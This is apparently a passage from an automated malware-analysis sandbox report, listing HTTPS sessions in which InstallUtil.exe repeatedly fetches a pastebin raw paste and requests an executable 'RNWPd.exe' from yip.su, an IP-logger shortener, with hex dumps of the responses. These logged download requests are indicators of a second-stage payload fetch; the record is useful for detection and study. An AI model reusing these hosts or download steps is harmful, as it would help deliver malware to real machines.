                                                2024-08-09 21:02:06 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                                                Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                                                2024-08-09 21:02:06 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                                                Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                                                2024-08-09 21:02:06 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.649751172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:11 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:11 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf89a82343b2-EWR
                                                2024-08-09 21:02:11 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:02:11 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:02:11 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:11 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.649752188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:12 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:12 UTC920INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:12 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:12 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6M8ihYcl0uPRlt%2FU0vMQCLvEf%2Bw5cQq%2B9%2FwA2IT5jS2YuhEWE%2FPGqB%2Fiz1Geuj7wSJ8D%2B%2BDBaDFW%2FpAmbWUKTZ%2F1HKkdodfaQrrs559CRKY%2B0WD%2F1vuAQk%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf8daac319eb-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:12 UTC449INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:12 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e
                                                Data Ascii: eta name="revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon
                                                2024-08-09 21:02:12 UTC1369INData Raw: 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62
                                                Data Ascii: dius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-web
                                                2024-08-09 21:02:12 UTC1369INData Raw: 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d
                                                Data Ascii: tData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}
                                                2024-08-09 21:02:12 UTC1369INData Raw: 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70
                                                Data Ascii: _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap
                                                2024-08-09 21:02:12 UTC1369INData Raw: 74 68 3a 31 35 34 70 78 3b 68 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f
                                                Data Ascii: th:154px;height:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="do
                                                2024-08-09 21:02:12 UTC176INData Raw: 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: Math.random()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.649753172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:17 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:17 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aafad9c5dc347-EWR
                                                2024-08-09 21:02:17 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:02:17 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:02:17 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:17 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.649754188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:17 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:18 UTC906INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:17 GMT
                                                strict-transport-security: max-age=604800
